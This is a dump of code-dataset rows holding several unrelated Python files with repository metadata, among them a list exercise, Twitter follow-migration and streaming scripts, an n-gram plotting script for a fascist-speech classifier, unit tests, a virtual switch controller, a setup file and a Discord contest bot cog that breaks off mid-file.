| 23.027027 | 115 | 0.692488 | 322 | 0.377934 | 0 | 0 | 83 | 0.097418 | 0 | 0 | 303 | 0.355634 |
d36269c78388362ffe468847db09a5f3e9d22cf0 | 991 | py | Python | 2. Programming Fundamentals With Python (May 2021)/08. Exercise - Lists Basics/09_hello_france.py | kzborisov/SoftUni | ccb2b8850adc79bfb2652a45124c3ff11183412e | [
"MIT"
] | 1 | 2021-02-07T07:51:12.000Z | 2021-02-07T07:51:12.000Z | 2. Programming Fundamentals With Python (May 2021)/08. Exercise - Lists Basics/09_hello_france.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
] | null | null | null | 2. Programming Fundamentals With Python (May 2021)/08. Exercise - Lists Basics/09_hello_france.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
] | null | null | null | # Task 09. Hello, France
def validate_price(items_and_prices):
item = items_and_prices.split('->')[0]
prices = float(items_and_prices.split('->')[1])
if item == 'Clothes' and prices <= 50 or \
item == 'Shoes' and prices <= 35.00 or \
item == 'Accessories' and prices <= 20.50:
return True
return False
items_and_prices = input().split('|')
budget = float(input())
initial_budget = budget
new_prices = []
for item in items_and_prices:
item_price = float(item.split('->')[1])
if budget - item_price < 0:
continue
if validate_price(item):
budget -= item_price
new_price = item_price + (item_price * 0.40)
new_prices.append(new_price)
earned = sum(new_prices)
profit = budget + (earned-initial_budget)
budget += earned
if budget >= 150:
result = 'Hello, France!'
else:
result = 'Time to go.'
print(' '.join([f'{x:.2f}' for x in new_prices]))
print(f'Profit: {profit:.2f}')
print(result)
| 24.775 | 54 | 0.624622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 133 | 0.134208 |
d362769ab3fa5593c05cc6ae7ad19f0af97efd9e | 7,293 | py | Python | main.py | itsjoel/migrate-following-python | cb212441ff608f7e68d29181cd13c4744c4bb57b | [
"MIT"
] | 1 | 2018-09-06T17:15:59.000Z | 2018-09-06T17:15:59.000Z | main.py | itsjoel/migrate-following-python | cb212441ff608f7e68d29181cd13c4744c4bb57b | [
"MIT"
] | null | null | null | main.py | itsjoel/migrate-following-python | cb212441ff608f7e68d29181cd13c4744c4bb57b | [
"MIT"
] | null | null | null | """Finds out all the people you need to follow to follow all the same people as another user. Then, optionally, follows them for you."""
import configparser
import csv
import errno
import os
import tweepy
from tqdm import tqdm
#Useful Constants
PATH_TO_TARGET_CSV = "./output/targetfriends.csv"
PATH_TO_USER_CSV = "./output/yourfriends.csv"
PATH_TO_DIFF_CSV = "./output/difffriends.csv"
# Getting API Keys
SECRETS = configparser.ConfigParser()
SECRETS.read("secrets.ini")
# Gonna have to get ur own keys to use this
API_KEY = SECRETS["API KEYS"]["ConsumerKey"]
API_SECRET = SECRETS["API KEYS"]["ConsumerSecret"]
# https://gist.github.com/garrettdreyfus/8153571
def yes_or_no(question):
while "the answer is invalid":
reply = str(input(question + ' (y/n): ')).lower().strip()
if reply[0] == 'y':
return True
if reply[0] == 'n':
return False
#Creating Folders
#https://stackoverflow.com/a/273227
try:
os.makedirs("./output")
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Setting Up API
AUTH = tweepy.OAuthHandler(API_KEY, API_SECRET, 'oob')
REDIRECT_URL = AUTH.get_authorization_url()
print("Go to " + REDIRECT_URL +
" and sign in on the account you want to transfer your Following list to.")
API = tweepy.API(AUTH, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
AUTH.get_access_token(input("Enter the key that comes up here: "))
# https://stackoverflow.com/a/19302732
def list_to_csv(list_to_dump, filename):
with open(filename, "w") as output:
writer = csv.writer(output, lineterminator='\n')
for val in list_to_dump:
writer.writerow([val])
# https://stackoverflow.com/a/19302732
def two_lists_to_csv(header, in_list1, in_list2, filename):
list1 = [header] + in_list1
list2 = [" "] + in_list2
with open(filename, 'w', newline='') as csv_file:
writer = csv.writer(csv_file)
writer.writerows(zip(list1, list2))
# Wrote this one myself actually. It's for debugging.
def check_limits():
limits = API.rate_limit_status()['resources']
for category_name in limits:
category = limits[category_name]
for item_name in category:
item = limits[category_name][item_name]
if item['limit'] != item['remaining']:
print(item_name, item)
# https://stackoverflow.com/a/312464
def chunks(my_list, len_of_chunk):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(my_list), len_of_chunk):
yield my_list[i:i + len_of_chunk]
# https://stackoverflow.com/a/39320334
def get_100_usernames(list_of_ids):
""" can only do lookup in steps of 100;
so 'ids' should be a list of 100 ids
"""
user_objs = API.lookup_users(user_ids=list_of_ids)
return [user.screen_name for user in user_objs]
# This one too
def get_usernames(ids):
usernames = []
for chunk in tqdm(chunks(ids, 100), unit="hundred names"):
usernames += get_100_usernames(chunk)
return usernames
# Wow, this one as well
def retrieve_usernames(list_of_ids, dict_of_ids_to_names):
"""
For retrieving usernames when we've already gotten them from twitter.
For saving on API requests
"""
usernames = []
for user_id in list_of_ids:
usernames.append(dict_of_ids_to_names[user_id])
return usernames
# https://codereview.stackexchange.com/a/101947
def get_list_of_friends(target_id):
ids = []
for friend in tqdm(tweepy.Cursor(API.friends_ids, id=target_id).items(), unit="Friend"):
ids.append(friend)
return ids
def _check_csv_header_(filename, text_to_check_for):
try:
with open(filename) as csvfile:
if list(csv.reader(csvfile))[0][0] == text_to_check_for:
return True
return False
except IOError:
return False
def detect_progress(name_of_target, name_of_user):
"""
Returns Tuple (is_target_finished, is_user_finished, is_diff_finished)
"""
is_target_finished = _check_csv_header_(PATH_TO_TARGET_CSV, name_of_target)
is_user_finished = _check_csv_header_(PATH_TO_USER_CSV, name_of_user)
is_diff_finished = _check_csv_header_(PATH_TO_DIFF_CSV, name_of_target + " - " + name_of_user)
return (is_target_finished, is_user_finished, is_diff_finished)
def restore_progress(filename):
"""
Returns
-------
id_list : list
List of ids restored from the CSV
name_list : list
List of names restored from the CSV
"""
with open(filename) as csvfile:
csvfile = csv.reader(csvfile)
csvfile = list(map(list, zip(*csvfile))) #https://stackoverflow.com/a/6473724 Transposing lists
id_list = csvfile[0][1:]
id_list = [int(s) for s in id_list]
name_list = csvfile[1][1:]
return id_list, name_list
TARGET = input("Target Username (who we'll be copying from): ")
MY_SCREEN_NAME = API.me().screen_name
PROGRESS = detect_progress(TARGET, MY_SCREEN_NAME)
USE_PROGRESS = yes_or_no("Should we use progress from last time? (Choose no if the target has followed anyone since last time or you haven't run this before)")
if not PROGRESS[0] or not USE_PROGRESS: #If we haven't already finished getting friends from the target
print("Getting List of Friends (Following) of Target...")
TARGET_FRIEND_IDS = get_list_of_friends(TARGET)
print("Converting IDs to names...")
TARGET_FRIEND_NAMES = get_usernames(TARGET_FRIEND_IDS)
print("Saving to CSV...")
two_lists_to_csv(TARGET, TARGET_FRIEND_IDS, TARGET_FRIEND_NAMES, PATH_TO_TARGET_CSV)
else:
print("Restoring Progress on Target...")
TARGET_FRIEND_IDS, TARGET_FRIEND_NAMES = restore_progress(PATH_TO_TARGET_CSV)
#Save names for later
NAMES_DICT = dict(zip(TARGET_FRIEND_IDS, TARGET_FRIEND_NAMES))
print("Getting List of Your Friends (Following)...")
YOUR_FRIEND_IDS = get_list_of_friends(API.me().id)
print("Converting IDs to names...")
YOUR_FRIEND_NAMES = get_usernames(YOUR_FRIEND_IDS)
print("Saving to CSV...")
two_lists_to_csv(MY_SCREEN_NAME, YOUR_FRIEND_IDS, YOUR_FRIEND_NAMES, PATH_TO_USER_CSV)
print("Subtracting who you've already followed...")
DIFF_FRIEND_IDS = [f for f in TARGET_FRIEND_IDS if f not in YOUR_FRIEND_IDS]
print("Converting ids to names...")
DIFF_FRIEND_NAMES = retrieve_usernames(DIFF_FRIEND_IDS, NAMES_DICT)
print("Saving to CSV...")
two_lists_to_csv(TARGET+" - "+MY_SCREEN_NAME,DIFF_FRIEND_IDS, DIFF_FRIEND_NAMES, "./output/diffriends.csv")
print(TARGET_FRIEND_IDS)
print("To follow everyone that Target follows, you need to follow:\n\n\n" +
"\n@".join(DIFF_FRIEND_NAMES))
print("At some point your account may be limited and unable to follow any more people. Probably will go away. ¯\\_(ツ)_/¯")
if yes_or_no("Are you sure you want to (try to) follow %s users?" % len(DIFF_FRIEND_IDS)):
print("Begin following.")
for followtuple in zip(tqdm(DIFF_FRIEND_IDS, unit="Friend"), DIFF_FRIEND_NAMES):
user_id, name = followtuple
tqdm.write("Following @" + name + "...")
API.create_friendship(user_id)
| 37.020305 | 160 | 0.688057 | 0 | 0 | 180 | 0.024668 | 0 | 0 | 0 | 0 | 2,482 | 0.34014 |
d363473272e75d741fdc620437d901b3dcaf7ba6 | 1,962 | py | Python | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | import pandas as pd
import matplotlib.pyplot as plt
from nltk import ngrams
from preprocessing.preprocess import remove_stopwords
"""
frequent_ngrams.py was used to generate bar plots of most frequently used
bi and trigrams from the fascist and hate documents.
@Author: Siôn Davies
Date: July 2020
"""
# First the fascist documents...
df = pd.read_csv('../Datasets/dataset_utils/Gold_cleaned.csv')
df.Message_Post = df.Message_Post.apply(remove_stopwords)
def converter(Fascist_Speech):
if Fascist_Speech == 'Yes':
return 1
else:
return 0
df['Numeric_Label'] = df['Fascist_Speech'].apply(converter)
fascist = df[df.Numeric_Label == 1]
def list_format(data):
words = data.split()
return [word for word in words]
words = list_format(''.join(str(fascist.Message_Post.tolist())))
bigrams_series = (pd.Series(ngrams(words, 2)).value_counts())[:12]
trigrams_series = (pd.Series(ngrams(words, 3)).value_counts())[:12]
bigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 3))
plt.ylabel('Bigram')
plt.xlabel('Frequency')
plt.show()
trigrams_series.sort_values().plot.barh(color='navy', width =0.7, figsize=(7, 4))
plt.ylabel('Trigram')
plt.xlabel('Frequency')
plt.show()
# Now to do the same for the hate documents...
df_hate = pd.read_csv('../Datasets/Multiclass/Hate_Fascist_Gold.csv')
df_hate.Message_Post = df_hate.Message_Post.apply(remove_stopwords)
hate = df_hate[df_hate.Label == 2]
hate_words = list_format(''.join(str(hate.Message_Post.tolist())))
hate_bigrams_series = (pd.Series(ngrams(hate_words, 2)).value_counts())[:12]
hate_trigrams_series = (pd.Series(ngrams(hate_words, 3)).value_counts())[:12]
hate_bigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 3))
plt.ylabel('Bigram')
plt.xlabel('Frequency')
plt.show()
hate_trigrams_series.sort_values().plot.barh(color='navy', width =0.7, figsize=(7, 4))
plt.ylabel('Trigram')
plt.xlabel('Frequency')
plt.show()
| 29.727273 | 86 | 0.735984 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 484 | 0.246561 |
d36373609911bdb8c7a337fdef0874b327dc17a2 | 1,319 | py | Python | tests/util/test_doWaitWebRequest.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | null | null | null | tests/util/test_doWaitWebRequest.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | 31 | 2015-06-15T22:50:50.000Z | 2021-09-30T14:14:51.000Z | tests/util/test_doWaitWebRequest.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | null | null | null | from unittest.mock import Mock
from urllib.error import URLError
from codalib import util
def test_is_sucessful(monkeypatch):
"""
Verifies the return value from a successful call to
doWaitWebRequest.
"""
response = Mock()
doWebRequest = Mock(return_value=(response, 'fake content'))
# Patch doWebRequest so that we do not make an http request.
monkeypatch.setattr('codalib.util.doWebRequest', doWebRequest)
url = 'http://example.com/foo/bar'
return_value = util.doWaitWebRequest(url)
assert return_value == (response, 'fake content')
def test_retries_request(monkeypatch):
"""
Check that the request is attempted again if a URLError is raised.
"""
waitForURL, response = Mock(), Mock()
side_effect = [
URLError('Fake Error'),
(response, 'fake content')
]
doWebRequest = Mock(side_effect=side_effect)
# Patch doWebRequest and waitForURL so we do not make an http request.
monkeypatch.setattr('codalib.util.doWebRequest', doWebRequest)
monkeypatch.setattr('codalib.util.waitForURL', waitForURL)
url = 'http://example.com/foo/bar'
return_value = util.doWaitWebRequest(url)
assert waitForURL.call_count == 1
waitForURL.assert_called_with(url)
assert return_value == (response, 'fake content')
| 29.977273 | 74 | 0.70508 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 504 | 0.382108 |
d36608a45bbd659af854e64d4a6a6c33241191d1 | 1,609 | py | Python | setup.py | giuse/brutelogger | 1979576b7d78f2e35cdf12b936d912783f7a1d34 | [
"MIT"
] | 1 | 2021-05-14T10:21:35.000Z | 2021-05-14T10:21:35.000Z | setup.py | giuse/brutelogger | 1979576b7d78f2e35cdf12b936d912783f7a1d34 | [
"MIT"
] | null | null | null | setup.py | giuse/brutelogger | 1979576b7d78f2e35cdf12b936d912783f7a1d34 | [
"MIT"
] | null | null | null | # Thanks `https://github.com/pypa/sampleproject`!!
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'VERSION'), 'r', encoding='utf-8') as f:
version = f.read().strip()
with open(path.join(here, 'README.md'), 'r', encoding='utf-8') as f:
long_description = f.read()
setup(
name = 'brutelogger',
version = version,
description = 'A brutish file logger for when you just need to `tee` your screen.',
long_description = long_description,
long_description_content_type='text/markdown',
url = 'https://github.com/giuse/brutelogger',
author = 'Giuseppe Cuccu',
author_email = 'giuseppe.cuccu@gmail.com',
license = 'MIT',
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
keywords = 'logging tee',
packages = find_packages(exclude=['contrib', 'docs', 'tests']), # Required
python_requires = '>=3.6, <4',
install_requires = [],
project_urls={
'Bug Reports' : 'https://github.com/giuse/brutelogger/issues',
'Source' : 'https://github.com/giuse/brutelogger/',
},
download_url = f"https://github.com/giuse/brutelogger/archive/{version}.tar.gz",
)
| 38.309524 | 91 | 0.625233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 809 | 0.502797 |
d367233e6f58eb094faf45709e0f359789a76a55 | 1,226 | py | Python | stream.py | seweithotroyman/twips | 3c4745706bbf333bf1f54f07c7a6508675f10195 | [
"MIT"
] | null | null | null | stream.py | seweithotroyman/twips | 3c4745706bbf333bf1f54f07c7a6508675f10195 | [
"MIT"
] | null | null | null | stream.py | seweithotroyman/twips | 3c4745706bbf333bf1f54f07c7a6508675f10195 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 26 19:39:00 2019
@author: hehehe
"""
from __future__ import absolute_import, print_function
from tweepy import OAuthHandler, Stream, StreamListener
#Buat API Twitter di link berikut https://developer.twitter.com/en/apps
consumer_key = "masukkan consumer_key"
consumer_secret = "masukkan consumer_secret"
access_token = "masukkan access_token"
access_token_secret = "masukkan access_token_secret"
class TukangBaca(StreamListener):
""" A listener handles tweets that are received from the stream.
This is a basic listener that just prints received tweets to stdout.
"""
def on_data(self, data):
baca = json.loads(data)
print("\n\n pada", baca["created_at"])
print(baca["id_str"])
print("Tweet: ",baca["text"])
print("Jumlah Retweet: ",baca["retweet_count"])
print("Jumlah favorit: ", baca["favorite_count"])
print(baca["user"])
return True
if __name__ == '__main__':
l = TukangBaca()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
query=input("Masukkan Keyword : ")
stream = Stream(auth, l)
stream.filter(track=[query])
| 30.65 | 72 | 0.701468 | 522 | 0.425775 | 0 | 0 | 0 | 0 | 0 | 0 | 551 | 0.449429 |
d36e33b56a0770e7874922971f3529c94e845e2e | 683 | py | Python | collatz.py | hansperu/pands-problems-2020-hp | 5394788fad848cae579b7bc8a67369166609c32d | [
"MIT"
] | null | null | null | collatz.py | hansperu/pands-problems-2020-hp | 5394788fad848cae579b7bc8a67369166609c32d | [
"MIT"
] | null | null | null | collatz.py | hansperu/pands-problems-2020-hp | 5394788fad848cae579b7bc8a67369166609c32d | [
"MIT"
] | null | null | null | #ask user to enter a positive value (pedir al usuario que ingrese un valor positivo)
a = int(input("please enter a positive integer: "))
#if value entered is negative print "not a positive number" and stop (si el valor introducido es una impresion negativa "no es un número positivo" y se detiene)
while a < 0:
print (a,"is not a positive number")
break
#prints value of (a) when positive integer (imprime el valor de (a) cuando entero positivo)
while a > 0:
print (a)
break
#perform calculations until reaches 1 (realizar cálculos hasta llegar a 1)
while a > 1:
if a % 2 == 0:
a = int(a/2)
else:
a = int((a*3)+1)
print (a) | 28.458333 | 160 | 0.660322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 472 | 0.689051 |
d36ecdbaec7f5e0f40d109acc1f21404c31625fa | 8,788 | py | Python | core/vswitch_controller_pxp.py | shreyagupta30/vineperf | d5c0a03054f720da2a5ff9eba74feee57fb0296d | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2017-05-18T03:25:39.000Z | 2021-04-30T18:35:32.000Z | core/vswitch_controller_pxp.py | shreyagupta30/vineperf | d5c0a03054f720da2a5ff9eba74feee57fb0296d | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-11-26T09:29:12.000Z | 2021-03-19T22:59:35.000Z | core/vswitch_controller_pxp.py | shreyagupta30/vineperf | d5c0a03054f720da2a5ff9eba74feee57fb0296d | [
"ECL-2.0",
"Apache-2.0"
] | 16 | 2016-12-09T12:47:04.000Z | 2021-05-20T09:28:37.000Z | # Copyright 2016-2018 Intel Corporation., Tieto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""VSwitch controller for multi VM scenarios with serial or parallel connection
"""
import netaddr
from core.vswitch_controller import IVswitchController
from conf import settings
class VswitchControllerPXP(IVswitchController):
"""VSwitch controller for PXP deployment scenario.
"""
def __init__(self, deployment, vswitch_class, traffic):
"""See IVswitchController for general description
"""
super().__init__(deployment, vswitch_class, traffic)
self._pxp_topology = 'parallel' if deployment.startswith('pvpv') else 'serial'
if deployment == 'pvp':
self._pxp_vm_count = 1
elif deployment.startswith('pvvp') or deployment.startswith('pvpv'):
if len(deployment) > 4:
self._pxp_vm_count = int(deployment[4:])
else:
self._pxp_vm_count = 2
else:
raise RuntimeError('Unknown number of VMs involved in {} deployment.'.format(deployment))
self._deployment_scenario = deployment
self._bidir = True if self._traffic['bidir'] == 'True' else False
self._bridge = settings.getValue('VSWITCH_BRIDGE_NAME')
def setup(self):
""" Sets up the switch for PXP
"""
self._logger.debug('Setup using %s', str(self._vswitch_class))
try:
self._vswitch.start()
self._vswitch.add_switch(self._bridge)
# create physical ports
(phy1, _) = self._vswitch.add_phy_port(self._bridge)
(phy2, _) = self._vswitch.add_phy_port(self._bridge)
# create VM ports
# initialize vport array to requested number of VMs
guest_nics = settings.getValue('GUEST_NICS_NR')
vm_ports = [[] for _ in range(self._pxp_vm_count)]
# create as many VM ports as requested by configuration, but configure
# only even number of NICs or just one
for vmindex in range(self._pxp_vm_count):
# just for case, enforce even number of NICs or 1
nics_nr = int(guest_nics[vmindex] / 2) * 2 if guest_nics[vmindex] > 1 else 1
self._logger.debug('Create %s vports for %s. VM with index %s',
nics_nr, vmindex + 1, vmindex)
for _ in range(nics_nr):
(vport, _) = self._vswitch.add_vport(self._bridge)
vm_ports[vmindex].append(vport)
# configure connections according to the TC definition
if self._pxp_topology == 'serial':
# NOTE: all traffic from VMs is sent to other ports directly
# without applying traffic options to avoid issues with MAC swapping
# and upper layer mods performed inside guests
# insert connections for phy ports first
# from 1st PHY to 1st vport of 1st VM
self._vswitch.add_connection(self._bridge, phy1, vm_ports[0][0], self._traffic)
self._vswitch.add_connection(self._bridge, vm_ports[0][0], phy1)
# from last vport of last VM to 2nd phy
self._vswitch.add_connection(self._bridge, vm_ports[self._pxp_vm_count-1][-1], phy2)
self._vswitch.add_connection(self._bridge, phy2, vm_ports[self._pxp_vm_count-1][-1], self._traffic)
# add serial connections among VMs and VM NICs pairs if needed
# in case of multiple NICs pairs per VM, the pairs are chained
# first, before connection to the next VM is created
for vmindex in range(self._pxp_vm_count):
# connect VMs NICs pairs in case of 4 and more NICs per VM
connections = [(vm_ports[vmindex][2*(x+1)-1],
vm_ports[vmindex][2*(x+1)])
for x in range(int(len(vm_ports[vmindex])/2)-1)]
for connection in connections:
self._vswitch.add_connection(self._bridge, connection[0], connection[1])
self._vswitch.add_connection(self._bridge, connection[1], connection[0])
# connect last NICs to the next VM if there is any
if self._pxp_vm_count > vmindex + 1:
self._vswitch.add_connection(self._bridge, vm_ports[vmindex][-1], vm_ports[vmindex+1][0])
self._vswitch.add_connection(self._bridge, vm_ports[vmindex+1][0], vm_ports[vmindex][-1])
else:
mac_value = netaddr.EUI(self._traffic['l2']['dstmac']).value
ip_value = netaddr.IPAddress(self._traffic['l3']['dstip']).value
port_value = self._traffic['l4']['dstport']
# initialize stream index; every NIC pair of every VM uses unique stream
stream = 0
for vmindex in range(self._pxp_vm_count):
# iterate through all VMs NIC pairs...
if len(vm_ports[vmindex]) > 1:
port_pairs = [(vm_ports[vmindex][2*x],
vm_ports[vmindex][2*x+1]) for x in range(int(len(vm_ports[vmindex])/2))]
else:
# ...or connect VM with just one NIC to both phy ports
port_pairs = [(vm_ports[vmindex][0], vm_ports[vmindex][0])]
for port_pair in port_pairs:
# override traffic options to ensure, that traffic is
# dispatched among VMs connected in parallel
options = {'multistream':1,
'stream_type':self._traffic['stream_type'],
'pre_installed_flows':'Yes'}
# update connection based on trafficgen settings
if self._traffic['stream_type'] == 'L2':
tmp_mac = netaddr.EUI(mac_value + stream)
tmp_mac.dialect = netaddr.mac_unix_expanded
options.update({'l2':{'dstmac':tmp_mac}})
elif self._traffic['stream_type'] == 'L3':
tmp_ip = netaddr.IPAddress(ip_value + stream)
options.update({'l3':{'dstip':tmp_ip}})
elif self._traffic['stream_type'] == 'L4':
options.update({'l3':{'proto':self._traffic['l3']['proto']}})
options.update({'l4':{'dstport':(port_value + stream) % 65536}})
else:
raise RuntimeError('Unknown stream_type {}'.format(self._traffic['stream_type']))
# insert connection to dispatch traffic from physical ports
# to VMs based on stream type; all traffic from VMs is
# sent to physical ports to avoid issues with MAC swapping
# and upper layer mods performed inside guests
self._vswitch.add_connection(self._bridge, phy1, port_pair[0], options)
self._vswitch.add_connection(self._bridge, port_pair[1], phy2)
self._vswitch.add_connection(self._bridge, phy2, port_pair[1], options)
self._vswitch.add_connection(self._bridge, port_pair[0], phy1)
# every NIC pair needs its own unique traffic stream
stream += 1
except:
self._vswitch.stop()
raise
def stop(self):
"""Tears down the switch created in setup().
"""
self._logger.debug('Stop using %s', str(self._vswitch_class))
self._vswitch.stop()
def get_ports_info(self):
"""See IVswitchController for description
"""
self._logger.debug('get_ports_info using %s', str(self._vswitch_class))
return self._vswitch.get_ports(self._bridge)
def dump_vswitch_connections(self):
"""See IVswitchController for description
"""
self._vswitch.dump_connections(self._bridge)
| 51.694118 | 115 | 0.575444 | 8,012 | 0.911698 | 0 | 0 | 0 | 0 | 0 | 0 | 2,934 | 0.333864 |
d36f6676ccb48b50304e83341d6e479105d79633 | 14,104 | py | Python | gofest/gofest.py | yamikaitou/rotom | e75cc421e75fcd17921a258e836129b105437191 | [
"MIT"
] | null | null | null | gofest/gofest.py | yamikaitou/rotom | e75cc421e75fcd17921a258e836129b105437191 | [
"MIT"
] | 4 | 2019-01-24T20:13:54.000Z | 2019-05-17T17:47:29.000Z | gofest/gofest.py | yamikaitou/rotom | e75cc421e75fcd17921a258e836129b105437191 | [
"MIT"
] | null | null | null | from redbot.core import commands, Config, checks
import discord
from discord.ext import tasks
import random
import math
from datetime import datetime
class GoFest(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.contest.start()
@commands.is_owner()
@commands.command()
async def gofest(self, ctx):
guild = self.bot.get_guild(331635573271822338)
overwrite = discord.PermissionOverwrite()
overwrite.send_messages = False
overwrite.read_messages = True
chan = await guild.create_text_channel(
"contest-chat",
category=self.bot.get_channel(735618943988793374)
)
await chan.send("Welcome to Go-Fest 2020! It has been a while since we have had a contest so lets have *multiple* for our first ever Play-At-Home Go-Fest. Check out each channel and read the rules for them. They are each different and have very specific entry periods. I will be controlling access to the channels, so they will only be open during the applicable period. Any questions, poke YamiKaitou")
chan = await guild.create_text_channel(
"ar-photos",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="AR Photo Contest", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 26 9pm")
embed.add_field(name="Rules", value="* Take an AR or AR+ Snapshot of any Pokemon\n* Post the screenshot in this channel\n* React to your favorite screenshots. Any reaction will count as a vote but you can only vote once per photo.")
embed.add_field(name="Notes", value="* All entries must be submitted by 9pm on Sunday\n* Voting will end at 10pm on Tuesday\n* Multiple entries are allowed, but you can only win once. Please post each entries as a separate message to allow for proper voting\n* Screenshots must be taken with the in-game feature (no collages, no device screenshots, no camera photos, etc)")
embed.add_field(name="Prize", value="1st Place: $15 Gift Card for Apple App Store or Google Play\n2nd Place: $10 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out.")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"most-shinies-saturday",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Most Shinies (Saturday)", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 25 9pm")
embed.add_field(name="Rules", value="* Catch Shinies\n* Tell us your final Shiny count at the end of the Go-Fest Day (honor system, I probably won't ask for screenshots)")
embed.add_field(name="Notes", value="* All entries must be submitted by 9pm on Saturday\n* You can only win 1 of the Most Shiny contests")
embed.add_field(name="Prize", value="$10 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out.")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"most-shinies-sunday",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Most Shinies (Sunday)", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 26 10am - July 26 9pm")
embed.add_field(name="Rules", value="* Catch Shinies\n* Tell us your final Shiny count at the end of Go-Fest Day (honor system, I probably won't ask for screenshots)")
embed.add_field(name="Notes", value="* All entries must be submitted by 9pm on Sunday\n* You can only win 1 of the Most Shiny contests")
embed.add_field(name="Prize", value="$10 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out.")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"most-shinies-weekend",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Most Shinies (Weekend)", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 26 10pm")
